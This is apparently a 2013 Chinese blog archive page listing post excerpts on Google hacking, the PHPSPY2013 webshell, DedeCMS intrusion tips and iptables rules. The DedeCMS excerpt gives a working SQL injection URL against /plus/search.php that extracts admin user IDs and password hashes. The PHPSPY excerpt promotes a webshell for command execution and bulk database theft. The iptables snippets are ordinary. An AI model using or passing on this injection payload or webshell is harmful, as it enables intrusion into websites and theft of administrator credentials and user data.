05 2013 档案

Google搜索技巧挑战隐私(Google hacker)
摘要:Google Hacking的含义原指利用Google Google搜索引擎搜索信息来进行入侵的技术和行为,现指利用各种搜索引擎搜索信息来进行入侵的技术和行为.Google Hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉Google Hacking其实并非如此简单。看论坛没人发google hacker之类的,我就发个吧。个人还是挺喜欢google,这个是不是完整版的我就不清楚了,然后这个也不是我翻 阅读全文

posted @ 2013-05-23 09:29 cn三少<script></script> 阅读(1314) 评论(0) 推荐(0) 编辑

PHPSPY2013
摘要:PHPSPY2013的功能主要还是以文件管理、数据库管理、执行命令、查看系统信息为主。目前改进如下。1.删除通过数据库上传、下载文件,因为这个功能需要连接数据库的用户拥有FILE权限,有一定的局限性,而且不常用。所以删除以达到缩小体积的目的。需要用的可以用PHPSPY2011。2.增强导出数据的兼容性。以方便拖库的同学。已经测试过两个不同语言不同编码的800万条数据的库。导出文件大小1G。 6分钟。无错导出并且能无错导入。并且能显示正确的编码文字。爽了。3.删除数据库的插入、编辑功能。这个功能当初是为了考虑数据库挂马方便。但是现在挂马的很少了。红客学院而且完全可以自己执行SQL语句来实现。所以 阅读全文

posted @ 2013-05-10 15:31 cn三少<script></script> 阅读(2034) 评论(0) 推荐(0) 编辑

搞dedecms站 找后台的一些经验
摘要:首先:注入exp有时候 有些/plus/目录换成了/plugins目录/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a/plus/search.php?keyword=as&type 阅读全文

posted @ 2013-05-03 15:08 cn三少<script></script> 阅读(266) 评论(0) 推荐(0) 编辑

iptable 端口限制客户端IP并发数
摘要:iptables -I INPUT -p tcp --dport 80 -m iplimit --iplimit-above 100 \ --iplimit-mask 24 -j REJECT 阅读全文

posted @ 2013-05-02 14:39 cn三少<script></script> 阅读(203) 评论(0) 推荐(0) 编辑

IPTABLE 端口范围指定
摘要:-A INPUT -i eth0 -s xxxxxxxx/32 -p tcp -m multiport --dports 21,30000:30100 -j ACCEPT 阅读全文

posted @ 2013-05-02 14:38 cn三少<script></script> 阅读(228) 评论(0) 推荐(0) 编辑

导航

< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5
点击右上角即可分享
微信分享提示